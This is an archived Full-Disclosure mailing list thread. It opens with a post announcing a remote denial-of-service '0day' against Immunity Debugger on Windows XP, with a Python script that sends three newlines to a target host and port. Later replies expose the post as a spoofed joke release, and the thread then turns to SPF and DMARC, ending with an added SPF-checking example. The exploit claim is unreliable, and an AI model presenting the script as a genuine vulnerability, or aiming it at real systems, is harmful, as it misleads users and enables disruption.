Mailing List Archive: Full Disclosure: Full-Disclosure

Windows XP denial of service 0day found in CTF exercise



adam at infosecinstitute

Apr 16, 2012, 11:48 PM

Post #1 of 10 (459 views)
Windows XP denial of service 0day found in CTF exercise

Immunity Debugger Remote Denial of Service 0Day
Tested against version 1.76 and 1.80 on Windows XP distributions

Has not been tested for potential privilege escalation vectors.

We first wrote about Immunity Debugger here: http://news.infosecinstitute.com/general/release-immunity-debugger-v1-80/

Discovered by a student that wishes to remain anonymous in the course CTF. This 0day exploit for Windows was discovered by a student in the InfoSec Institute Ethical Hacking class, during an evening CTF exercise. The student wishes to remain anonymous, he has contributed a python version of the 0day. A patch that can be applied to Windows has not been made available. You can find a python version of the exploit to copy and paste here:


#!/usr/bin/python
#Windows XP denial of service 0day exploit discovered on 4.9.12 by InfoSec Institute student
#For full write up and description go to http://www.infosecinstitute.com/courses/ethical_hacking_training.html
from __future__ import print_function
import sys
import getopt
import socket


class Error(Exception):
    def __init__(self, error):
        self.errorStr = error

    def __str__(self):
        return repr(self.errorStr)


class Exploit():

    def __init__(self, targetHost, targetPort):
        self.targetHost = targetHost
        self.targetPort = targetPort

    def exploit(self, targetHost, targetPort):
        # Validate the dotted-quad address and open a TCP connection to the target.
        try:
            socket.inet_aton(targetHost)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((targetHost, targetPort))
        except socket.error:
            raise Error("Unable to exploit (Connect failed.)")

        # exploit: the whole "payload" is three newline characters written to
        # the connected stream socket (sendall replaces the original sendto,
        # whose address argument is ignored on a connected TCP socket).
        try:
            s.sendall(b"\n\n\n")
        except socket.error:
            raise Error("Unable to exploit (Exploit failed.)")
        finally:
            s.close()


def usage():
    print("[!] Usage:")
    print("      ( -h, --help ):")
    print("            Print this message.")
    print("      ( --targetHost= ): Target host.")
    print("            --targetHost=127.0.0.1")
    print("      ( --targetPort= ): Target port.")
    print("            --targetPort=8888")


def main():
    print("[$] Windows XP 0Day")
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h", ["help", "targetHost=", "targetPort="])
    except getopt.GetoptError as err:
        # Print help information and exit:
        print("[!] Parameter error: " + str(err))  # Will print something like "option -a not recognized"
        usage()
        sys.exit(0)

    targetHost = None
    targetPort = None

    for opt, arg in opts:
        if opt in ("-h", "--help"):
            usage()
            sys.exit(0)
        elif opt == "--targetHost":
            targetHost = arg
        elif opt == "--targetPort":
            targetPort = arg
        else:
            # getopt already rejects unknown options, so this branch should never run.
            print("[!] Parameter error.")
            usage()
            sys.exit(0)

    if not targetHost:
        print("[!] Parameter error: targetHost not set.")
        usage()
        sys.exit(0)

    if not targetPort:
        print("[!] Parameter error: targetPort not set.")
        usage()
        sys.exit(0)

    exploit = Exploit(targetHost, targetPort)

    print("[*] Attempting to exploit:")

    try:
        exploit.exploit(targetHost, int(targetPort))
    except Error as error:
        print("[!] Exploit Error: %s" % (error.errorStr))
        sys.exit(0)
    print("[*] Exploit appears to have worked.")


# Standard boilerplate to call the main() function to begin
# the program.
if __name__ == '__main__':
    main()
Attachments: immunity.png (92.8 KB)


memvandal at gmail

Apr 17, 2012, 12:42 AM

Post #2 of 10 (452 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

Windows XP 0day? LOL. seems InfoSec Institute is going crazy day by day.

and who exploits remote DDoS on 127.0.0.1 and takes screenshot?! lol

MemoryVandal


On Tue, Apr 17, 2012 at 12:18 PM, Adam Behnke <adam [at] infosecinstitute>wrote:

> Immunity Debugger Remote Denial of Service 0Day
> Tested against version 1.76 and 1.80 on Windows XP distributions


achileos at gmail

Apr 17, 2012, 12:46 AM

Post #3 of 10 (458 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

You didn't even read the mail! And, yes, they actually have chosen a
quite misleading title and content for the mail ...


>> Immunity Debugger Remote Denial of Service 0Day
>> Tested against version 1.76 and 1.80 on Windows XP distributions

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


memvandal at gmail

Apr 17, 2012, 1:50 AM

Post #4 of 10 (451 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

well, i did read the mail completely. the response was just to poke fun ;)

didn't test the code though but, just sending "\n\n\n" does ddos is
something really funny.

MemoryVandal



On Tue, Apr 17, 2012 at 1:16 PM, Romain Bourdy <achileos [at] gmail> wrote:

> You didn't even read the mail ! And, yes, they actually have chosen a
> quite misleading title and content for the mail ...
>
>
> >> Immunity Debugger Remote Denial of Service 0Day
> >> Tested against version 1.76 and 1.80 on Windows XP distributions
>


mihamina at rktmb

Apr 17, 2012, 3:12 AM

Post #5 of 10 (438 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

On 04/17/2012 11:50 AM, Memory Vandal wrote:
> didnt test the code though but, just sending "\n\n\n" does ddos is
> something really funny.

Did someone test? :-)


--
RMA.



justin at madirish

Apr 17, 2012, 5:26 AM

Post #6 of 10 (442 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

> Windows XP denial of service 0day found in CTF exercise

Oof, this is almost as bad as that BackTrack 0 day released the other
day
(http://www.backtrack-linux.org/backtrack/backtrack-0day-privilege-escalation/).
Any response from Microsoft yet?

Justin C. Klein Keane
http://www.MadIrish.net

The PGP signature on this email can be verified using the public key at
http://www.madirish.net/gpgkey

On 04/17/2012 02:48 AM, Adam Behnke wrote:
> Immunity Debugger Remote Denial of Service 0Day Tested against
> version 1.76 and 1.80 on Windows XP distributions
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iPwEAQECAAYFAk+NYXEACgkQkSlsbLsN1gBiggb/efTTww5szr9rcI+NbsUzybuk
rhPyvj99VJMMVCUjHrDrWKXQeTD/rrorY3SYMIGNlHzVWgqkiswM5N16Fy9MvqIH
2Cc8aJ5kh2xi9vtlCHlPZ7XJeN3tPEL+8/qOVbT7I2CNeD8JJseVfcJwnoEyyumm
SZYmoxjJriMT7IAXysHJudaF294DvC+z6drvF+ou8wnVcIB0nkXoCVNsbcDK9dwS
R4f0a+QYN1tXM7+8za6/VznbDwcqw/amqeS3V883lqlt0XCHx5zIh+VxG0qvB5Ui
EPjoh3P/OEMP7PYRozM=
=y+j6
-----END PGP SIGNATURE-----



adam at infosecinstitute

Apr 17, 2012, 7:07 AM

Post #7 of 10 (433 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

Guys, this is a fake release, someone spoofed my email and sent this out
as a joke to mock the wicd release from last week. Please note that if you
click on the links, there is nothing there concerning this.




>
> On 04/17/2012 02:48 AM, Adam Behnke wrote:
>> Immunity Debugger Remote Denial of Service 0Day Tested against
>> version 1.76 and 1.80 on Windows XP distributions


secretpackets at gmail

Apr 17, 2012, 9:36 AM

Post #8 of 10 (425 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

This is awesome!

It's almost as awesome as a privilege escalation from root to root that
works only in backtrack.

--
tuna
65617420646120706f6f20706f6f



On Tue, Apr 17, 2012 at 10:07, <adam [at] infosecinstitute> wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.


elazar at hushmail

Apr 17, 2012, 2:48 PM

Post #9 of 10 (432 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

<snip>
Received-SPF: softfail (lists.grok.org.uk: transitioning domain of
adam [at] infosecinstitute does not designate 46.167.245.118 as
permitted sender)

Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk (Postfix) with ESMTP id D4324C0
for <full-disclosure [at] lists>; Tue, 17 Apr 2012 07:58:09 +0100 (BST)
</snip>


At least configure your SPF record policy to hard fail, and consider Domain Keys and/or DMARC.

elazar

On Tuesday, April 17, 2012 at 10:40 AM, adam [at] infosecinstitute wrote:
> Guys, this is a fake release, someone spoofed my email and sent this out
> as a joke to mock the wicd release from last week. Please note that if you
> click on the links, there is nothing there concerning this.


Valdis.Kletnieks at vt

Apr 17, 2012, 4:10 PM

Post #10 of 10 (425 views)
Re: Windows XP denial of service 0day found in CTF exercise [In reply to]

On Tue, 17 Apr 2012 17:48:47 -0400, "Elazar Broad" said:

> At least configure your SPF record policy to hard fail, and consider Domain Keys and/or DMARC.

Given where his MX's point, and the fact that the SPF includes a :include that
points at another domain, simply setting it to "hard fail" without breaking his
e-mail may or may not be easy to do. Similarly, if he sets it to hard fail, he
probably can't turn on DKIM without the cooperation of the domain listed in the
:include

(A *lot* of sites that do SPF only code 'soft fail' so that other tools like
spamassassin can add a few points if the mail comes from an "unexpected" place,
but don't want to have hard-fail because that can break users. For instance,
we don't publish a hard-fail because that results in a support headache if one
of our professors goes to a conference and sends e-mail from his hotel room -
and the hotel network hijacks the connection. *loads* of fun to sort that out
when the professor calls our help desk from Seattle or Tokyo. And of course,
he's a chemical engineering professor, so has zero network debugging tools on
the laptop...)
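The two replies above turn on one detail in the headers Elazar quoted: the list server saw the message arrive from 46.167.245.118 (emkei.cz) and could only stamp it "softfail", because the sender domain's policy ends in a soft qualifier, and part of the policy is pulled in from another zone via include:. The following is an added example, not code from the thread or from any participant: it extracts the connecting relay from a message's own Received headers and evaluates a minimal SPF policy (ip4:, include: and all only) against it, using a constructed in-memory DNS table instead of real lookups. The Received line is the one quoted above; the domains softfail.example, hardfail.example and _spf.mailhost.example and their records are invented for illustration and are not any real domain's SPF policy.

```python
#!/usr/bin/env python3
"""Added example: locate the relay that handed a message to our MTA and
evaluate the sender domain's SPF record against it, so the practical
difference between "~all" (softfail) and "-all" (fail) is visible.
Only ip4:, include: and all are implemented.  DNS_TXT is a constructed
stand-in for DNS TXT lookups, not a real domain's policy."""
import ipaddress
import re
from email import message_from_string

# Constructed DNS table.  Both sender policies authorise the same relays and
# differ only in the final qualifier.  The include: pulls part of the policy
# from another zone, as in the situation described in the thread.
DNS_TXT = {
    "softfail.example": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailhost.example ~all",
    "hardfail.example": "v=spf1 ip4:192.0.2.0/24 include:_spf.mailhost.example -all",
    "_spf.mailhost.example": "v=spf1 ip4:198.51.100.0/24 -all",
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_DNS_LOOKUPS = 10  # RFC 7208 limit on DNS-querying mechanisms per check


def check_spf(domain, client_ip, _lookups=None):
    """Return pass / fail / softfail / neutral / none / permerror for
    client_ip claiming to send as domain."""
    if _lookups is None:
        _lookups = [0]
    record = DNS_TXT.get(domain)
    if record is None or not record.startswith("v=spf1"):
        return "none"
    ip = ipaddress.ip_address(client_ip)
    for term in record.split()[1:]:
        qualifier = "+"
        if term[0] in QUALIFIERS:
            qualifier, term = term[0], term[1:]
        if term.startswith("ip4:"):
            if ip in ipaddress.ip_network(term[4:], strict=False):
                return QUALIFIERS[qualifier]
        elif term.startswith("include:"):
            _lookups[0] += 1
            if _lookups[0] > MAX_DNS_LOOKUPS:
                return "permerror"
            # include: matches only when the referenced policy returns pass;
            # the other zone's own fail/softfail does not propagate.
            if check_spf(term[len("include:"):], client_ip, _lookups) == "pass":
                return QUALIFIERS[qualifier]
        elif term == "all":
            return QUALIFIERS[qualifier]
        else:
            return "permerror"  # mechanism not implemented in this example
    return "neutral"  # record ended without an "all" term


# "from <helo> (<rdns> [<ip>]) by <our host>", the shape Postfix writes.
RECEIVED_RE = re.compile(
    r"^from\s+\S+\s+\([^\[]*\[(\d{1,3}(?:\.\d{1,3}){3})\]\)\s+by\s+(\S+)")


def connecting_ip(raw_message, our_host):
    """IP of the relay that delivered the message to our_host: the first
    Received header (top of the message) stamped 'by our_host'.  Received
    headers further down the chain are attacker-controlled and ignored."""
    msg = message_from_string(raw_message)
    for received in msg.get_all("Received", []):
        m = RECEIVED_RE.match(" ".join(received.split()))
        if m and m.group(2) == our_host:
            return m.group(1)
    return None


def spf_verdict(raw_message, our_host, sender_domain):
    """The result a receiver would put in its Received-SPF header."""
    ip = connecting_ip(raw_message, our_host)
    if ip is None:
        return "none"
    return check_spf(sender_domain, ip)


# Constructed message: the Received line is the one quoted in the thread;
# the From: domain is a placeholder so the lookup hits the table above.
SAMPLE_MESSAGE = """\
Received: from emkei.cz (emkei.cz [46.167.245.118]) by lists.grok.org.uk (Postfix) with ESMTP id D4324C0
\tfor <full-disclosure@lists.grok.org.uk>; Tue, 17 Apr 2012 07:58:09 +0100 (BST)
From: adam@softfail.example
Subject: Windows XP denial of service 0day found in CTF exercise

Immunity Debugger Remote Denial of Service 0Day
"""

if __name__ == "__main__":
    relay = connecting_ip(SAMPLE_MESSAGE, "lists.grok.org.uk")
    for domain in ("softfail.example", "hardfail.example"):
        print("%s from %s -> %s" % (domain, relay, check_spf(domain, relay)))
```

Run as a script, the same relay yields "softfail" under the first record and "fail" under the second, while a relay inside the included zone (198.51.100.0/24) passes under both. Neither verdict blocks anything by itself: a receiver that only scores softfail, as Valdis describes, still delivers the spoof, and a hard fail only helps where the receiver enforces it, which is the gap a DMARC policy record is meant to close.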
